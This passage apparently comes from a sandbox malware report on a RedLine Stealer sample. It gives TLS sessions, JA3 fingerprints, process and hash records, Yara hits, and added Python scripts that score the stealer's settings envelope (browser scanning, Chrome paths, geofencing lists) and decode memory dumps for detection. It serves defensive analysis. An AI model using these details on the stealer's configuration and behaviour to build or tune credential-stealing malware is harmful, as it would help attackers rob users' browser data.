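        raise ValueError("not an EnvironmentSettingsResponse envelope")

    def flag(name):                                     # <a:Name>true</a:Name>
        el = result.find("a:" + name, NS)
        return el is not None and el.text == "true"

    def strings(name):                                  # DataContract string[] -> <b:string> items
        return [e.text for e in result.findall("a:%s/b:string" % name, NS)]

    return {"scan_browsers": flag("ScanBrowsers"),
            "blocked_country": strings("BlockedCountry"),
            "blocked_ip": strings("BlockedIP"),
            "chrome_paths": strings("ScanChromeBrowsersPaths")}
```

Running classify() over the session 5 head returns all five indicators; the contrasting request returns none. Any one of the indicators alone is weak (internal WCF services also leave tempuri.org in place), so treat them as a score to combine with the process context the report gives, here a binary running from %TEMP%. Empty BlockedCountry and BlockedIP lists mean the operator applied no geofencing to this build.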


                                                                                                                                                                                              HTTPS Packets

Each record lists the TLS session (Source IP:Port is the server side, Dest IP:Port the analysis machine), the certificate chain presented (leaf first), and the client's JA3 SSL Client Fingerprint and JA3 SSL Client Digest.

Timestamp: Jul 22, 2021 11:37:58.027946949 CEST
Source: 88.99.66.31:443  Destination: 192.168.2.3:49714
    Subject: CN=*.iplogger.org
    Issuer: CN=Sectigo RSA Domain Validation Secure Server CA, O=Sectigo Limited, L=Salford, ST=Greater Manchester, C=GB
    Not Before: Fri Nov 20 01:00:00 CET 2020  Not After: Sun Nov 21 00:59:59 CET 2021
    Subject: CN=Sectigo RSA Domain Validation Secure Server CA, O=Sectigo Limited, L=Salford, ST=Greater Manchester, C=GB
    Issuer: CN=USERTrust RSA Certification Authority, O=The USERTRUST Network, L=Jersey City, ST=New Jersey, C=US
    Not Before: Fri Nov 02 01:00:00 CET 2018  Not After: Wed Jan 01 00:59:59 CET 2031
    Subject: CN=USERTrust RSA Certification Authority, O=The USERTRUST Network, L=Jersey City, ST=New Jersey, C=US
    Issuer: CN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GB
    Not Before: Tue Mar 12 01:00:00 CET 2019  Not After: Mon Jan 01 00:59:59 CET 2029
JA3 SSL Client Fingerprint: 771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,0
JA3 SSL Client Digest: 37f463bf4616ecd445d4a1937da06e19

Timestamp: Jul 22, 2021 11:37:58.516778946 CEST
Source: 104.25.233.53:443  Destination: 192.168.2.3:49715
    Subject: CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=California, C=US
    Issuer: CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US
    Not Before: Fri Jun 11 02:00:00 CEST 2021  Not After: Sat Jun 11 01:59:59 CEST 2022
    Subject: CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US
    Issuer: CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE
    Not Before: Mon Jan 27 13:48:08 CET 2020  Not After: Wed Jan 01 00:59:59 CET 2025
JA3 SSL Client Fingerprint: 771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,0
JA3 SSL Client Digest: 37f463bf4616ecd445d4a1937da06e19

Timestamp: Jul 22, 2021 11:37:59.155395031 CEST
Source: 104.192.141.1:443  Destination: 192.168.2.3:49716
    Subject: CN=bitbucket.org, OU=Bitbucket, O="Atlassian, Inc.", L=San Francisco, ST=California, C=US, SERIALNUMBER=3928449, OID.1.3.6.1.4.1.311.60.2.1.2=Delaware, OID.1.3.6.1.4.1.311.60.2.1.3=US, OID.2.5.4.15=Private Organization
    Issuer: CN=DigiCert SHA2 Extended Validation Server CA, OU=www.digicert.com, O=DigiCert Inc, C=US
    Not Before: Fri Mar 27 01:00:00 CET 2020  Not After: Mon May 23 14:00:00 CEST 2022
    Subject: CN=DigiCert SHA2 Extended Validation Server CA, OU=www.digicert.com, O=DigiCert Inc, C=US
    Issuer: CN=DigiCert High Assurance EV Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US
    Not Before: Tue Oct 22 14:00:00 CEST 2013  Not After: Sun Oct 22 14:00:00 CEST 2028
JA3 SSL Client Fingerprint: 771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,0
JA3 SSL Client Digest: 37f463bf4616ecd445d4a1937da06e19

Timestamp: Jul 22, 2021 11:37:59.939636946 CEST
Source: 52.216.94.27:443  Destination: 192.168.2.3:49717
    Subject: CN=*.s3.amazonaws.com, O="Amazon.com, Inc.", L=Seattle, ST=Washington, C=US
    Issuer: CN=DigiCert Baltimore CA-2 G2, OU=www.digicert.com, O=DigiCert Inc, C=US
    Not Before: Mon Jan 11 01:00:00 CET 2021  Not After: Sat Feb 12 00:59:59 CET 2022
    Subject: CN=DigiCert Baltimore CA-2 G2, OU=www.digicert.com, O=DigiCert Inc, C=US
    Issuer: CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE
    Not Before: Tue Dec 08 13:05:07 CET 2015  Not After: Sat May 10 14:00:00 CEST 2025
JA3 SSL Client Fingerprint: 771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,0
JA3 SSL Client Digest: 37f463bf4616ecd445d4a1937da06e19

Timestamp: Jul 22, 2021 11:39:14.152019978 CEST
Source: 104.192.141.1:443  Destination: 192.168.2.3:49746
    Subject: CN=bitbucket.org, OU=Bitbucket, O="Atlassian, Inc.", L=San Francisco, ST=California, C=US, SERIALNUMBER=3928449, OID.1.3.6.1.4.1.311.60.2.1.2=Delaware, OID.1.3.6.1.4.1.311.60.2.1.3=US, OID.2.5.4.15=Private Organization
    Issuer: CN=DigiCert SHA2 Extended Validation Server CA, OU=www.digicert.com, O=DigiCert Inc, C=US
    Not Before: Fri Mar 27 01:00:00 CET 2020  Not After: Mon May 23 14:00:00 CEST 2022
    Subject: CN=DigiCert SHA2 Extended Validation Server CA, OU=www.digicert.com, O=DigiCert Inc, C=US
    Issuer: CN=DigiCert High Assurance EV Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US
    Not Before: Tue Oct 22 14:00:00 CEST 2013  Not After: Sun Oct 22 14:00:00 CEST 2028
JA3 SSL Client Fingerprint: 771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,0
JA3 SSL Client Digest: 3b5074b1b5d032e5620f69f9f700ff0e

Timestamp: Jul 22, 2021 11:39:15.092914104 CEST
Source: 52.217.80.20:443  Destination: 192.168.2.3:49747
    Subject: CN=*.s3.amazonaws.com, O="Amazon.com, Inc.", L=Seattle, ST=Washington, C=US
    Issuer: CN=DigiCert Baltimore CA-2 G2, OU=www.digicert.com, O=DigiCert Inc, C=US
    Not Before: Mon Jan 11 01:00:00 CET 2021  Not After: Sat Feb 12 00:59:59 CET 2022
    Subject: CN=DigiCert Baltimore CA-2 G2, OU=www.digicert.com, O=DigiCert Inc, C=US
    Issuer: CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE
    Not Before: Tue Dec 08 13:05:07 CET 2015  Not After: Sat May 10 14:00:00 CEST 2025
JA3 SSL Client Fingerprint: 771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,0
JA3 SSL Client Digest: 3b5074b1b5d032e5620f69f9f700ff0e
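Two distinct JA3 digests appear in the HTTPS table: the first four connections (iplogger.org, Cloudflare, bitbucket.org, S3 at 11:37:58-59) share 37f463bf4616ecd445d4a1937da06e19, and the repeat connections to bitbucket.org and S3 at 11:39:14-15 carry 3b5074b1b5d032e5620f69f9f700ff0e. The added example below (not code from the report) recomputes the digests from the fingerprint strings and shows exactly what differs between them. It assumes the report's "JA3 SSL Client Fingerprint" column is the standard comma-joined JA3 string, whose MD5 is by definition the JA3 digest.

```python
"""Recompute and compare the two JA3 client fingerprints from the HTTPS table (added example)."""
import hashlib

# The two JA3 SSL Client Fingerprint strings exactly as the report prints them.
JA3_FIRST = ("771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-"
             "49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,0")
JA3_SECOND = ("771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-"
              "49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,0")


def ja3_digest(fingerprint):
    """JA3 digest = MD5 over the ASCII fingerprint string, per the JA3 specification."""
    return hashlib.md5(fingerprint.encode("ascii")).hexdigest()


def parse_ja3(fingerprint):
    """Split the five JA3 fields (version, ciphers, extensions, curves, point formats) into ints.
    771 is 0x0303, i.e. a TLS 1.2 ClientHello; empty fields become empty lists."""
    fields = fingerprint.split(",")
    if len(fields) != 5:
        raise ValueError("JA3 string must have exactly 5 comma-separated fields")
    lists = [[int(x) for x in f.split("-")] if f else [] for f in fields[1:]]
    return {"version": int(fields[0]), "ciphers": lists[0], "extensions": lists[1],
            "curves": lists[2], "point_formats": lists[3]}


def diff_ciphers(a, b):
    """(suites only in b, suites only in a), each in the order the client offered them."""
    pa, pb = parse_ja3(a)["ciphers"], parse_ja3(b)["ciphers"]
    return ([c for c in pb if c not in pa], [c for c in pa if c not in pb])


def verify_report_digests(expected):
    """Check each (fingerprint, digest) pair from the report; returns the mismatching digests."""
    return [d for fp, d in expected if ja3_digest(fp) != d]


if __name__ == "__main__":
    for fp in (JA3_FIRST, JA3_SECOND):
        print(ja3_digest(fp), parse_ja3(fp)["version"], len(parse_ja3(fp)["ciphers"]), "ciphers")
    added, removed = diff_ciphers(JA3_FIRST, JA3_SECOND)
    print("added suites:", [hex(c) for c in added], "removed suites:", [hex(c) for c in removed])
```

The second fingerprint differs from the first only by two extra cipher suites inserted after the ECDHE-GCM group, 0x009f and 0x009e (the DHE-RSA AES-GCM suites); everything else, including the extension and curve lists, is identical. JA3 hashes only the ClientHello parameters, not the SNI, so one digest recurring across iplogger.org, Cloudflare, bitbucket.org and S3 is consistent with a single TLS client stack making those connections, and the change in digest at 11:39:14 indicates a differently configured client rather than a different destination. Both digests are common to Windows SChannel clients, so on their own they are not a good blocking rule; pair them with the destination and process context.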

Behavior

                                                                                                                                                                                              System Behavior

                                                                                                                                                                                              General

                                                                                                                                                                                              Start time:11:37:56
                                                                                                                                                                                              Start date:22/07/2021
                                                                                                                                                                                              Path:C:\Users\user\Desktop\Nb2HQZZDIf.exe
                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                              Commandline:'C:\Users\user\Desktop\Nb2HQZZDIf.exe'
                                                                                                                                                                                              Imagebase:0x140000000
                                                                                                                                                                                              File size:627616 bytes
                                                                                                                                                                                              MD5 hash:B8371590264DB62ECBBA4B7F481A21A8
                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                              Reputation:low

                                                                                                                                                                                              General

                                                                                                                                                                                              Start time:11:38:01
                                                                                                                                                                                              Start date:22/07/2021
                                                                                                                                                                                              Path:C:\Users\user\AppData\Roaming\1234.exe
                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                              Commandline:C:\Users\user\AppData\Roaming\1234.exe 1234
                                                                                                                                                                                              Imagebase:0xcf0000
                                                                                                                                                                                              File size:979968 bytes
                                                                                                                                                                                              MD5 hash:523AC177BFB4FB64A20B60FC0CE3E0E3
                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                              Programmed in:.Net C# or VB.NET
                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                              • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000002.00000002.304591133.00000000031FC000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                              • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000002.00000002.306824778.00000000042C0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                              Antivirus matches:
                                                                                                                                                                                              • Detection: 33%, ReversingLabs
                                                                                                                                                                                              Reputation:low

                                                                                                                                                                                              General

                                                                                                                                                                                              Start time:11:38:43
                                                                                                                                                                                              Start date:22/07/2021
                                                                                                                                                                                              Path:C:\Users\user\AppData\Roaming\1234.exe
                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                              Commandline:{path}
                                                                                                                                                                                              Imagebase:0x2e0000
                                                                                                                                                                                              File size:979968 bytes
                                                                                                                                                                                              MD5 hash:523AC177BFB4FB64A20B60FC0CE3E0E3
                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                              Reputation:low

General

Start time: 11:38:43
Start date: 22/07/2021
Path: C:\Users\user\AppData\Roaming\1234.exe
Wow64 process (32bit): true
Commandline: {path}
Imagebase: 0x680000
File size: 979968 bytes
MD5 hash: 523AC177BFB4FB64A20B60FC0CE3E0E3
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Yara matches:
• Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000F.00000002.382601084.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
Reputation: low

General

Start time: 11:39:19
Start date: 22/07/2021
Path: C:\Users\user\AppData\Local\Temp\srvs.exe
Wow64 process (32bit): true
Commandline: 'C:\Users\user\AppData\Local\Temp\srvs.exe'
Imagebase: 0xdf0000
File size: 3859368 bytes
MD5 hash: D11C21AB3E969F79E3C783FDD97E1C10
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Yara matches:
• Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000015.00000002.475705492.0000000000DF2000.00000040.00020000.sdmp, Author: Joe Security
• Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000015.00000003.382545912.0000000000D10000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_RedLine_1, Description: Yara detected RedLine Stealer, Source: 00000015.00000002.484278366.000000000386E000.00000004.00000001.sdmp, Author: Joe Security
Antivirus matches:
• Detection: 100%, Joe Sandbox ML
• Detection: 20%, Metadefender
• Detection: 36%, ReversingLabs
Reputation: low
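The Yara "Source" fields above name memory dumps, and reading them against each process's Imagebase tells you where RedLine was actually found: a PAGE_EXECUTE_READWRITE region inside srvs.exe's own image (section rights changed so the packer could decode code in place), versus executable memory at 0x402000 in 1234.exe, well away from its 0x680000 image base (an unpacked payload mapped at its own preferred base). The following script is an added example written for this report, not Joe Sandbox code. It assumes the identifier layout process-number.dump-index.sequence.address.protection.type (only the process number, address and Win32 page protection are decoded; the other fields are kept raw), and it uses the on-disk file size as a stand-in for the in-memory image size because the report does not give SizeOfImage.

```python
"""Decode the Joe Sandbox memory-dump identifiers quoted in the Yara
'Source' fields above and relate each hit to the process it came from.

Added example for this report, not part of the sandbox output.  Assumed
layout of an identifier such as
    0000000F.00000002.382601084.0000000000402000.00000040.00000001.sdmp
is process-number.dump-index.sequence.address.protection.type; only the
process number, region address and Win32 page protection are decoded.
"""
import re
from dataclasses import dataclass

# Documented Win32 PAGE_* protection constants.
PAGE_PROTECT = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
EXEC_MASK = 0xF0   # any PAGE_EXECUTE* value
WRITE_MASK = 0xCC  # PAGE_READWRITE, PAGE_WRITECOPY and their EXECUTE variants

DUMP_RE = re.compile(
    r"^(?P<proc>[0-9A-Fa-f]{8})\.(?P<index>[0-9A-Fa-f]{8})\.(?P<seq>\d+)\."
    r"(?P<addr>[0-9A-Fa-f]{16})\.(?P<prot>[0-9A-Fa-f]{8})\."
    r"(?P<kind>[0-9A-Fa-f]{8})\.sdmp$"
)


@dataclass
class DumpRef:
    proc: int        # per-analysis process number (assumed hex; not the OS PID)
    index: int       # dump index within that process
    seq: str         # kept raw, meaning not decoded
    addr: int        # base of the dumped region
    protect: int     # Win32 page protection at dump time
    kind_raw: str    # kept raw, meaning not decoded

    @property
    def protect_name(self) -> str:
        return PAGE_PROTECT.get(self.protect & 0xFF, f"0x{self.protect:x}")


def parse_dump_ref(name: str) -> DumpRef:
    m = DUMP_RE.match(name.strip())
    if not m:
        raise ValueError(f"not a sandbox dump identifier: {name!r}")
    return DumpRef(int(m["proc"], 16), int(m["index"], 16), m["seq"],
                   int(m["addr"], 16), int(m["prot"], 16), m["kind"])


def in_image(addr: int, imagebase: int, file_size: int) -> bool:
    """Rough check whether addr lies inside the mapped main module.  The
    report gives no SizeOfImage, so the on-disk file size stands in for it
    (assumption; sections are usually padded up, so this slightly under-reads)."""
    return imagebase <= addr < imagebase + file_size


def classify(ref: DumpRef, imagebase: int, file_size: int) -> str:
    """Label a Yara hit by where it landed and how the page was protected."""
    exe = bool(ref.protect & EXEC_MASK)
    wr = bool(ref.protect & WRITE_MASK)
    if in_image(ref.addr, imagebase, file_size):
        # RWX inside the loaded image: section rights were changed so the
        # packer could decode code in place ('changes PE section rights').
        return "rwx-in-image" if exe and wr else "in-image"
    # Executable memory away from the main module: a payload mapped at its
    # own preferred base (0x400000 is the classic default ImageBase).
    return "exec-outside-image" if exe else "data-outside-image"


# Process facts copied from the two 'General' blocks above.
PROCESSES = {
    "1234.exe": dict(imagebase=0x680000, file_size=979968, hits=[
        "0000000F.00000002.382601084.0000000000402000.00000040.00000001.sdmp",
    ]),
    "srvs.exe": dict(imagebase=0xDF0000, file_size=3859368, hits=[
        "00000015.00000002.475705492.0000000000DF2000.00000040.00020000.sdmp",
        "00000015.00000003.382545912.0000000000D10000.00000004.00000001.sdmp",
        "00000015.00000002.484278366.000000000386E000.00000004.00000001.sdmp",
    ]),
}


def report() -> list:
    """One row per Yara hit: (process, proc number, address, protection, label)."""
    rows = []
    for name, p in PROCESSES.items():
        for src in p["hits"]:
            ref = parse_dump_ref(src)
            rows.append((name, ref.proc, hex(ref.addr), ref.protect_name,
                         classify(ref, p["imagebase"], p["file_size"])))
    return rows


if __name__ == "__main__":
    for row in report():
        print(*row, sep="\t")
```

The two PAGE_READWRITE hits in srvs.exe (0xD10000 and 0x386E000, both outside the image) are the pattern to expect from decrypted configuration or string tables rather than code; the RWX hit at 0xDF2000, 0x2000 past the 0xDF0000 image base, is where the first section of the loaded module would sit, which is why the report also flags unpacking by section-right changes.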

Disassembly

Code Analysis